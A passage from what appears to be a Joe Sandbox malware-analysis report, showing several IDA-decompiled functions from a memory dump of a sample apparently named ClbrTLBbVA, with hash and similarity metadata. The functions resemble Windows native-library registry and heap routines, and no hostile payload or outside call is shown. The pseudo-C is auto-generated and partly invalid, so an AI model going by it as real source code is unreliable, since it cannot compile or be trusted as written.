                                        				} else {
                                        					_v12 = _v12 | 0xffffffff;
                                        					_t58 = _t120 + 0x24;
                                        					_t109 =  *(_t120 + 0x18);
                                        					_t118 = _t58;
                                        					_v16 = _t58;
                                        					E016BB02A( *(_t120 + 0x18), _t118, 0x14a5);
                                        					_v52 = 0x18;
                                        					_v48 = 0;
                                        					0x840 = 0x40;
                                        					if( *0x1797c1c != 0) {
                                        					}
                                        					_v40 = 0x840;
                                        					_v44 = _t105;
                                        					_v36 = 0;
                                        					_v32 = 0;
                                        					if(E016C7D50() != 0) {
                                        						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        					} else {
                                        						_t64 = 0x7ffe0384;
                                        					}
                                        					if( *_t64 != 0) {
                                        						_t65 =  *[fs:0x30];
                                        						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                        						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                        							_t100 = E016C7D50();
                                        							__eflags = _t100;
                                        							if(_t100 == 0) {
                                        								_t101 = 0x7ffe0385;
                                        							} else {
                                        								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        							}
                                        							__eflags =  *_t101 & 0x00000020;
                                        							if(( *_t101 & 0x00000020) != 0) {
                                        								_t118 = _t118 | 0xffffffff;
                                        								_t109 = 0x1485;
                                        								E01727016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                        							}
                                        						}
                                        					}
                                        					_t105 = 0;
                                        					while(1) {
                                        						_push(0x60);
                                        						_push(5);
                                        						_push( &_v64);
                                        						_push( &_v52);
                                        						_push(0x100021);
                                        						_push( &_v12);
                                        						_t122 = E016E9830();
                                        						if(_t122 >= 0) {
                                        							break;
                                        						}
                                        						__eflags = _t122 - 0xc0000034;
                                        						if(_t122 == 0xc0000034) {
                                        							L38:
                                        							_t120 = 0xc0000135;
                                        							break;
                                        						}
                                        						__eflags = _t122 - 0xc000003a;
                                        						if(_t122 == 0xc000003a) {
                                        							goto L38;
                                        						}
                                        						__eflags = _t122 - 0xc0000022;
                                        						if(_t122 != 0xc0000022) {
                                        							break;
                                        						}
                                        						__eflags = _t105;
                                        						if(__eflags != 0) {
                                        							break;
                                        						}
                                        						_t109 = _t119;
                                        						_t99 = E017269A6(_t119, __eflags);
                                        						__eflags = _t99;
                                        						if(_t99 == 0) {
                                        							break;
                                        						}
                                        						_t105 = _t105 + 1;
                                        					}
                                        					if( !_t120 >= 0) {
                                        						L22:
                                        						_t56 = _t120;
                                        						goto L23;
                                        					}
                                        					if( *0x1797c04 != 0) {
                                        						_t118 = _v12;
                                        						_t120 = E0172A7AC(_t119, _t118, _t109);
                                        						__eflags = _t120;
                                        						if(_t120 >= 0) {
                                        							goto L10;
                                        						}
                                        						__eflags =  *0x1797bd8;
                                        						if( *0x1797bd8 != 0) {
                                        							L20:
                                        							if(_v12 != 0xffffffff) {
                                        								_push(_v12);
                                        								E016E95D0();
                                        							}
                                        							goto L22;
                                        						}
                                        					}
                                        					L10:
                                        					_push(_v12);
                                        					_t105 = _t119 + 0xc;
                                        					_push(0x1000000);
                                        					_push(0x10);
                                        					_push(0);
                                        					_push(0);
                                        					_push(0xf);
                                        					_push(_t105);
                                        					_t120 = E016E99A0();
                                        					if(_t120 < 0) {
                                        						__eflags = _t120 - 0xc000047e;
                                        						if(_t120 == 0xc000047e) {
                                        							L51:
                                        							_t74 = E01723540(_t120);
                                        							_t119 = _v16;
                                        							_t120 = _t74;
                                        							L52:
                                        							_t118 = 0x1485;
                                        							E016AB1E1(_t120, 0x1485, 0, _t119);
                                        							goto L20;
                                        						}
                                        						__eflags = _t120 - 0xc000047f;
                                        						if(_t120 == 0xc000047f) {
                                        							goto L51;
                                        						}
                                        						__eflags = _t120 - 0xc0000462;
                                        						if(_t120 == 0xc0000462) {
                                        							goto L51;
                                        						}
                                        						_t119 = _v16;
                                        						__eflags = _t120 - 0xc0000017;
                                        						if(_t120 != 0xc0000017) {
                                        							__eflags = _t120 - 0xc000009a;
                                        							if(_t120 != 0xc000009a) {
                                        								__eflags = _t120 - 0xc000012d;
                                        								if(_t120 != 0xc000012d) {
                                        									_v28 = _t119;
                                        									_push( &_v56);
                                        									_push(1);
                                        									_v24 = _t120;
                                        									_push( &_v28);
                                        									_push(1);
                                        									_push(2);
                                        									_push(0xc000007b);
                                        									_t79 = E016EAAF0();
                                        									__eflags = _t79;
                                        									if(_t79 >= 0) {
                                        										__eflags =  *0x1798474 - 3;
                                        										if( *0x1798474 != 3) {
                                        											 *0x17979dc =  *0x17979dc + 1;
                                        										}
                                        									}
                                        								}
                                        							}
                                        						}
                                        						goto L52;
                                        					}
                                        					if(E016C7D50() != 0) {
                                        						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        					} else {
                                        						_t83 = 0x7ffe0384;
                                        					}
                                        					if( *_t83 != 0) {
                                        						_t84 =  *[fs:0x30];
                                        						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                        						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                        							_t94 = E016C7D50();
                                        							__eflags = _t94;
                                        							if(_t94 == 0) {
                                        								_t95 = 0x7ffe0385;
                                        							} else {
                                        								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                        							}
                                        							__eflags =  *_t95 & 0x00000020;
                                        							if(( *_t95 & 0x00000020) != 0) {
                                        								E01727016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                        							}
                                        						}
                                        					}
                                        					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                        						if( *0x1798708 != 0) {
                                        							_t118 =  *0x7ffe0330;
                                        							_t123 =  *0x1797b00; // 0x0
                                        							asm("ror esi, cl");
                                        							 *0x179b1e0(_v12, _v20, 0x20);
                                        							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                        							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                        							asm("sbb esi, esi");
                                        							_t120 =  ~_t50 & _t93;
                                        						} else {
                                        							_t120 = 0;
                                        						}
                                        					}
                                        					if( !_t120 >= 0) {
                                        						L19:
                                        						_push( *_t105);
                                        						E016E95D0();
                                        						 *_t105 =  *_t105 & 0x00000000;
                                        						goto L20;
                                        					}
                                        					_t120 = E016B7F65(_t119);
                                        					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                        						__eflags = _t120;
                                        						if(_t120 < 0) {
                                        							goto L19;
                                        						}
                                        						 *(_t119 + 0x64) = _v12;
                                        						goto L22;
                                        					}
                                        					goto L19;
                                        				}
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9f484e196b4f6e4d18f8be677049980f25be93c4bb78ebca498b4ee879c0a56f
                                        • Instruction ID: 6c590aa484f69954e50d885a1e9bc250bc55a920dd9b9bb77ab359237cd5c645
                                        • Opcode Fuzzy Hash: 9f484e196b4f6e4d18f8be677049980f25be93c4bb78ebca498b4ee879c0a56f
                                        • Instruction Fuzzy Hash: 4D913431E01215EBEF319BACCC48BADBBA4EB05724F050269FA52AB2D5D7749D41CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E016AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                        				signed int _v8;
                                        				char _v1036;
                                        				signed int _v1040;
                                        				char _v1048;
                                        				signed int _v1052;
                                        				signed char _v1056;
                                        				void* _v1058;
                                        				char _v1060;
                                        				signed int _v1064;
                                        				void* _v1068;
                                        				intOrPtr _v1072;
                                        				void* _v1084;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t70;
                                        				intOrPtr _t72;
                                        				signed int _t74;
                                        				intOrPtr _t77;
                                        				signed int _t78;
                                        				signed int _t81;
                                        				void* _t101;
                                        				signed int _t102;
                                        				signed int _t107;
                                        				signed int _t109;
                                        				signed int _t110;
                                        				signed char _t111;
                                        				signed int _t112;
                                        				signed int _t113;
                                        				signed int _t114;
                                        				intOrPtr _t116;
                                        				void* _t117;
                                        				char _t118;
                                        				void* _t120;
                                        				char _t121;
                                        				signed int _t122;
                                        				signed int _t123;
                                        				signed int _t125;
                                        
                                        				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                        				_v8 =  *0x179d360 ^ _t125;
                                        				_t116 = _a4;
                                        				_v1056 = _a16;
                                        				_v1040 = _a24;
                                        				if(E016B6D30( &_v1048, _a8) < 0) {
                                        					L4:
                                        					_pop(_t117);
                                        					_pop(_t120);
                                        					_pop(_t101);
                                        					return E016EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                        				}
                                        				_t70 = _a20;
                                        				if(_t70 >= 0x3f4) {
                                        					_t121 = _t70 + 0xc;
                                        					L19:
                                        					_t107 =  *( *[fs:0x30] + 0x18);
                                        					__eflags = _t107;
                                        					if(_t107 == 0) {
                                        						L60:
                                        						_t68 = 0xc0000017;
                                        						goto L4;
                                        					}
                                        					_t72 =  *0x1797b9c; // 0x0
                                        					_t74 = L016C4620(_t107, _t107, _t72 + 0x180000, _t121);
                                        					_v1064 = _t74;
                                        					__eflags = _t74;
                                        					if(_t74 == 0) {
                                        						goto L60;
                                        					}
                                        					_t102 = _t74;
                                        					_push( &_v1060);
                                        					_push(_t121);
                                        					_push(_t74);
                                        					_push(2);
                                        					_push( &_v1048);
                                        					_push(_t116);
                                        					_t122 = E016E9650();
                                        					__eflags = _t122;
                                        					if(_t122 >= 0) {
                                        						L7:
                                        						_t114 = _a12;
                                        						__eflags = _t114;
                                        						if(_t114 != 0) {
                                        							_t77 = _a20;
                                        							L26:
                                        							_t109 =  *(_t102 + 4);
                                        							__eflags = _t109 - 3;
                                        							if(_t109 == 3) {
                                        								L55:
                                        								__eflags = _t114 - _t109;
                                        								if(_t114 != _t109) {
                                        									L59:
                                        									_t122 = 0xc0000024;
                                        									L15:
                                        									_t78 = _v1052;
                                        									__eflags = _t78;
                                        									if(_t78 != 0) {
                                        										L016C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                        									}
                                        									_t68 = _t122;
                                        									goto L4;
                                        								}
                                        								_t110 = _v1056;
                                        								_t118 =  *((intOrPtr*)(_t102 + 8));
                                        								_v1060 = _t118;
                                        								__eflags = _t110;
                                        								if(_t110 == 0) {
                                        									L10:
                                        									_t122 = 0x80000005;
                                        									L11:
                                        									_t81 = _v1040;
                                        									__eflags = _t81;
                                        									if(_t81 == 0) {
                                        										goto L15;
                                        									}
                                        									__eflags = _t122;
                                        									if(_t122 >= 0) {
                                        										L14:
                                        										 *_t81 = _t118;
                                        										goto L15;
                                        									}
                                        									__eflags = _t122 - 0x80000005;
                                        									if(_t122 != 0x80000005) {
                                        										goto L15;
                                        									}
                                        									goto L14;
                                        								}
                                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                        								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                        									goto L10;
                                        								}
                                        								_push( *((intOrPtr*)(_t102 + 8)));
                                        								_t59 = _t102 + 0xc; // 0xc
                                        								_push(_t110);
                                        								L54:
                                        								E016EF3E0();
                                        								_t125 = _t125 + 0xc;
                                        								goto L11;
                                        							}
                                        							__eflags = _t109 - 7;
                                        							if(_t109 == 7) {
                                        								goto L55;
                                        							}
                                        							_t118 = 4;
                                        							__eflags = _t109 - _t118;
                                        							if(_t109 != _t118) {
                                        								__eflags = _t109 - 0xb;
                                        								if(_t109 != 0xb) {
                                        									__eflags = _t109 - 1;
                                        									if(_t109 == 1) {
                                        										__eflags = _t114 - _t118;
                                        										if(_t114 != _t118) {
                                        											_t118 =  *((intOrPtr*)(_t102 + 8));
                                        											_v1060 = _t118;
                                        											__eflags = _t118 - _t77;
                                        											if(_t118 > _t77) {
                                        												goto L10;
                                        											}
                                        											_push(_t118);
                                        											_t56 = _t102 + 0xc; // 0xc
                                        											_push(_v1056);
                                        											goto L54;
                                        										}
                                        										__eflags = _t77 - _t118;
                                        										if(_t77 != _t118) {
                                        											L34:
                                        											_t122 = 0xc0000004;
                                        											goto L15;
                                        										}
                                        										_t111 = _v1056;
                                        										__eflags = _t111 & 0x00000003;
                                        										if((_t111 & 0x00000003) == 0) {
                                        											_v1060 = _t118;
                                        											__eflags = _t111;
                                        											if(__eflags == 0) {
                                        												goto L10;
                                        											}
                                        											_t42 = _t102 + 0xc; // 0xc
                                        											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                        											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                        											_push(_t111);
                                        											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                        											_push(0);
                                        											_push( &_v1048);
                                        											_t122 = E016E13C0(_t102, _t118, _t122, __eflags);
                                        											L44:
                                        											_t118 = _v1072;
                                        											goto L11;
                                        										}
                                        										_t122 = 0x80000002;
                                        										goto L15;
                                        									}
                                        									_t122 = 0xc0000024;
                                        									goto L44;
                                        								}
                                        								__eflags = _t114 - _t109;
                                        								if(_t114 != _t109) {
                                        									goto L59;
                                        								}
                                        								_t118 = 8;
                                        								__eflags = _t77 - _t118;
                                        								if(_t77 != _t118) {
                                        									goto L34;
                                        								}
                                        								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                        								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                        									goto L34;
                                        								}
                                        								_t112 = _v1056;
                                        								_v1060 = _t118;
                                        								__eflags = _t112;
                                        								if(_t112 == 0) {
                                        									goto L10;
                                        								}
                                        								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                        								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                        								goto L11;
                                        							}
                                        							__eflags = _t114 - _t118;
                                        							if(_t114 != _t118) {
                                        								goto L59;
                                        							}
                                        							__eflags = _t77 - _t118;
                                        							if(_t77 != _t118) {
                                        								goto L34;
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                        							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                        								goto L34;
                                        							}
                                        							_t113 = _v1056;
                                        							_v1060 = _t118;
                                        							__eflags = _t113;
                                        							if(_t113 == 0) {
                                        								goto L10;
                                        							}
                                        							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                        							goto L11;
                                        						}
                                        						_t118 =  *((intOrPtr*)(_t102 + 8));
                                        						__eflags = _t118 - _a20;
                                        						if(_t118 <= _a20) {
                                        							_t114 =  *(_t102 + 4);
                                        							_t77 = _t118;
                                        							goto L26;
                                        						}
                                        						_v1060 = _t118;
                                        						goto L10;
                                        					}
                                        					__eflags = _t122 - 0x80000005;
                                        					if(_t122 != 0x80000005) {
                                        						goto L15;
                                        					}
                                        					L016C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                        					L18:
                                        					_t121 = _v1060;
                                        					goto L19;
                                        				}
                                        				_push( &_v1060);
                                        				_push(0x400);
                                        				_t102 =  &_v1036;
                                        				_push(_t102);
                                        				_push(2);
                                        				_push( &_v1048);
                                        				_push(_t116);
                                        				_t122 = E016E9650();
                                        				if(_t122 >= 0) {
                                        					__eflags = 0;
                                        					_v1052 = 0;
                                        					goto L7;
                                        				}
                                        				if(_t122 == 0x80000005) {
                                        					goto L18;
                                        				}
                                        				goto L4;
                                        			}

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73c1f9974d9f6674bc545c44fb7bf82b33819d5edca76637aaa5e99ac91d1a3b
                                        • Instruction ID: d9d513c306318fdec497f75ac948fc8caebe8f65beefc4bdc4e6fe7e39e35fc7
                                        • Opcode Fuzzy Hash: 73c1f9974d9f6674bc545c44fb7bf82b33819d5edca76637aaa5e99ac91d1a3b
                                        • Instruction Fuzzy Hash: 4D8194766082019FDB2ACF5CC880A7AF7E5FB84350F14495EEE459B249D730EE45CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 39%
                                        			E0173B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                        				char _v8;
                                        				signed int _v12;
                                        				signed int _t80;
                                        				signed int _t83;
                                        				intOrPtr _t89;
                                        				signed int _t92;
                                        				signed char _t106;
                                        				signed int* _t107;
                                        				intOrPtr _t108;
                                        				intOrPtr _t109;
                                        				signed int _t114;
                                        				void* _t115;
                                        				void* _t117;
                                        				void* _t119;
                                        				void* _t122;
                                        				signed int _t123;
                                        				signed int* _t124;
                                        
                                        				_t106 = _a12;
                                        				if((_t106 & 0xfffffffc) != 0) {
                                        					return 0xc000000d;
                                        				}
                                        				if((_t106 & 0x00000002) != 0) {
                                        					_t106 = _t106 | 0x00000001;
                                        				}
                                        				_t109 =  *0x1797b9c; // 0x0
                                        				_t124 = L016C4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                        				if(_t124 != 0) {
                                        					 *_t124 =  *_t124 & 0x00000000;
                                        					_t124[1] = _t124[1] & 0x00000000;
                                        					_t124[4] = _t124[4] & 0x00000000;
                                        					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                        						L13:
                                        						_push(_t124);
                                        						if((_t106 & 0x00000002) != 0) {
                                        							_push(0x200);
                                        							_push(0x28);
                                        							_push(0xffffffff);
                                        							_t122 = E016E9800();
                                        							if(_t122 < 0) {
                                        								L33:
                                        								if((_t124[4] & 0x00000001) != 0) {
                                        									_push(4);
                                        									_t64 =  &(_t124[1]); // 0x4
                                        									_t107 = _t64;
                                        									_push(_t107);
                                        									_push(5);
                                        									_push(0xfffffffe);
                                        									E016E95B0();
                                        									if( *_t107 != 0) {
                                        										_push( *_t107);
                                        										E016E95D0();
                                        									}
                                        								}
                                        								_push(_t124);
                                        								_push(0);
                                        								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                        								L37:
                                        								L016C77F0();
                                        								return _t122;
                                        							}
                                        							_t124[4] = _t124[4] | 0x00000002;
                                        							L18:
                                        							_t108 = _a8;
                                        							_t29 =  &(_t124[0x105]); // 0x414
                                        							_t80 = _t29;
                                        							_t30 =  &(_t124[5]); // 0x14
                                        							_t124[3] = _t80;
                                        							_t123 = 0;
                                        							_t124[2] = _t30;
                                        							 *_t80 = _t108;
                                        							if(_t108 == 0) {
                                        								L21:
                                        								_t112 = 0x400;
                                        								_push( &_v8);
                                        								_v8 = 0x400;
                                        								_push(_t124[2]);
                                        								_push(0x400);
                                        								_push(_t124[3]);
                                        								_push(0);
                                        								_push( *_t124);
                                        								_t122 = E016E9910();
                                        								if(_t122 != 0xc0000023) {
                                        									L26:
                                        									if(_t122 != 0x106) {
                                        										L40:
                                        										if(_t122 < 0) {
                                        											L29:
                                        											_t83 = _t124[2];
                                        											if(_t83 != 0) {
                                        												_t59 =  &(_t124[5]); // 0x14
                                        												if(_t83 != _t59) {
                                        													L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                        												}
                                        											}
                                        											_push( *_t124);
                                        											E016E95D0();
                                        											goto L33;
                                        										}
                                        										 *_a16 = _t124;
                                        										return 0;
                                        									}
                                        									if(_t108 != 1) {
                                        										_t122 = 0;
                                        										goto L40;
                                        									}
                                        									_t122 = 0xc0000061;
                                        									goto L29;
                                        								} else {
                                        									goto L22;
                                        								}
                                        								while(1) {
                                        									L22:
                                        									_t89 =  *0x1797b9c; // 0x0
                                        									_t92 = L016C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                        									_t124[2] = _t92;
                                        									if(_t92 == 0) {
                                        										break;
                                        									}
                                        									_t112 =  &_v8;
                                        									_push( &_v8);
                                        									_push(_t92);
                                        									_push(_v8);
                                        									_push(_t124[3]);
                                        									_push(0);
                                        									_push( *_t124);
                                        									_t122 = E016E9910();
                                        									if(_t122 != 0xc0000023) {
                                        										goto L26;
                                        									}
                                        									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                        								}
                                        								_t122 = 0xc0000017;
                                        								goto L26;
                                        							}
                                        							_t119 = 0;
                                        							do {
                                        								_t114 = _t124[3];
                                        								_t119 = _t119 + 0xc;
                                        								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                        								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                        								_t123 = _t123 + 1;
                                        								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                        							} while (_t123 < _t108);
                                        							goto L21;
                                        						}
                                        						_push(0x28);
                                        						_push(3);
                                        						_t122 = E016AA7B0();
                                        						if(_t122 < 0) {
                                        							goto L33;
                                        						}
                                        						_t124[4] = _t124[4] | 0x00000001;
                                        						goto L18;
                                        					}
                                        					if((_t106 & 0x00000001) == 0) {
                                        						_t115 = 0x28;
                                        						_t122 = E0173E7D3(_t115, _t124);
                                        						if(_t122 < 0) {
                                        							L9:
                                        							_push(_t124);
                                        							_push(0);
                                        							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                        							goto L37;
                                        						}
                                        						L12:
                                        						if( *_t124 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L13;
                                        					}
                                        					_t15 =  &(_t124[1]); // 0x4
                                        					_t117 = 4;
                                        					_t122 = E0173E7D3(_t117, _t15);
                                        					if(_t122 >= 0) {
                                        						_t124[4] = _t124[4] | 0x00000001;
                                        						_v12 = _v12 & 0x00000000;
                                        						_push(4);
                                        						_push( &_v12);
                                        						_push(5);
                                        						_push(0xfffffffe);
                                        						E016E95B0();
                                        						goto L12;
                                        					}
                                        					goto L9;
                                        				} else {
                                        					return 0xc0000017;
                                        				}
                                        			}





















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1a68b8d6f7c1673f70d9c3e34a4aa20f7d1e149fd9ddcac8145811ba40fd335
                                        • Instruction ID: c1a949ae1ba97ef1da9414c2677d6d6e3dbaf5c5fa8b19b350d5d4f15354253e
                                        • Opcode Fuzzy Hash: f1a68b8d6f7c1673f70d9c3e34a4aa20f7d1e149fd9ddcac8145811ba40fd335
                                        • Instruction Fuzzy Hash: 0971DF32200B06EFE7328F29CC44F66BBE6EF84720F15452CE655872A2DB71E945CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E016A52A5(char __ecx) {
                                        				char _v20;
                                        				char _v28;
                                        				char _v29;
                                        				void* _v32;
                                        				void* _v36;
                                        				void* _v37;
                                        				void* _v38;
                                        				void* _v40;
                                        				void* _v46;
                                        				void* _v64;
                                        				void* __ebx;
                                        				intOrPtr* _t49;
                                        				signed int _t53;
                                        				short _t85;
                                        				signed int _t87;
                                        				signed int _t88;
                                        				signed int _t89;
                                        				intOrPtr _t101;
                                        				intOrPtr* _t102;
                                        				intOrPtr* _t104;
                                        				signed int _t106;
                                        				void* _t108;
                                        
                                        				_t93 = __ecx;
                                        				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                        				_push(_t88);
                                        				_v29 = __ecx;
                                        				_t89 = _t88 | 0xffffffff;
                                        				while(1) {
                                        					E016BEEF0(0x17979a0);
                                        					_t104 =  *0x1798210; // 0x1242be8
                                        					if(_t104 == 0) {
                                        						break;
                                        					}
                                        					asm("lock inc dword [esi]");
                                        					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                        					E016BEB70(_t93, 0x17979a0);
                                        					if( *((char*)(_t108 + 0xf)) != 0) {
                                        						_t101 =  *0x7ffe02dc;
                                        						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                        						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                        							L9:
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0x90028);
                                        							_push(_t108 + 0x20);
                                        							_push(0);
                                        							_push(0);
                                        							_push(0);
                                        							_push( *((intOrPtr*)(_t104 + 4)));
                                        							_t53 = E016E9890();
                                        							__eflags = _t53;
                                        							if(_t53 >= 0) {
                                        								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                        								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                        									E016BEEF0(0x17979a0);
                                        									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                        									E016BEB70(0, 0x17979a0);
                                        								}
                                        								goto L3;
                                        							}
                                        							__eflags = _t53 - 0xc0000012;
                                        							if(__eflags == 0) {
                                        								L12:
                                        								_t13 = _t104 + 0xc; // 0x1242bf5
                                        								_t93 = _t13;
                                        								 *((char*)(_t108 + 0x12)) = 0;
                                        								__eflags = E016DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                        								if(__eflags >= 0) {
                                        									L15:
                                        									_t102 = _v28;
                                        									 *_t102 = 2;
                                        									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                        									E016BEEF0(0x17979a0);
                                        									__eflags =  *0x1798210 - _t104; // 0x1242be8
                                        									if(__eflags == 0) {
                                        										__eflags =  *((char*)(_t108 + 0xe));
                                        										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                        										 *0x1798210 = _t102;
                                        										_t32 = _t102 + 0xc; // 0x0
                                        										 *_t95 =  *_t32;
                                        										_t33 = _t102 + 0x10; // 0x0
                                        										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                        										_t35 = _t102 + 4; // 0xffffffff
                                        										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                        										if(__eflags != 0) {
                                        											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                        											E01724888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                        										}
                                        										E016BEB70(_t95, 0x17979a0);
                                        										asm("lock xadd [esi], eax");
                                        										if(__eflags == 0) {
                                        											_push( *((intOrPtr*)(_t104 + 4)));
                                        											E016E95D0();
                                        											L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                        										}
                                        										asm("lock xadd [esi], ebx");
                                        										__eflags = _t89 == 1;
                                        										if(_t89 == 1) {
                                        											_push( *((intOrPtr*)(_t104 + 4)));
                                        											E016E95D0();
                                        											L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                        											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                        										}
                                        										_t49 = _t102;
                                        										L4:
                                        										return _t49;
                                        									}
                                        									E016BEB70(_t93, 0x17979a0);
                                        									asm("lock xadd [esi], eax");
                                        									if(__eflags == 0) {
                                        										_push( *((intOrPtr*)(_t104 + 4)));
                                        										E016E95D0();
                                        										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                        										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                        									}
                                        									 *_t102 = 1;
                                        									asm("lock xadd [edi], eax");
                                        									if(__eflags == 0) {
                                        										_t28 = _t102 + 4; // 0xffffffff
                                        										_push( *_t28);
                                        										E016E95D0();
                                        										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                        									}
                                        									continue;
                                        								}
                                        								_t93 =  &_v20;
                                        								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                        								_t85 = 6;
                                        								_v20 = _t85;
                                        								_t87 = E016DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                        								__eflags = _t87;
                                        								if(_t87 < 0) {
                                        									goto L3;
                                        								}
                                        								 *((char*)(_t108 + 0xe)) = 1;
                                        								goto L15;
                                        							}
                                        							__eflags = _t53 - 0xc000026e;
                                        							if(__eflags != 0) {
                                        								goto L3;
                                        							}
                                        							goto L12;
                                        						}
                                        						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                        						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                        							goto L3;
                                        						} else {
                                        							goto L9;
                                        						}
                                        					}
                                        					L3:
                                        					_t49 = _t104;
                                        					goto L4;
                                        				}
                                        				_t49 = 0;
                                        				goto L4;
                                        			}


























                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 291d00e327f000677985d9332a899b9e898e70f8b1b7a57ef01373a2b92a18cc
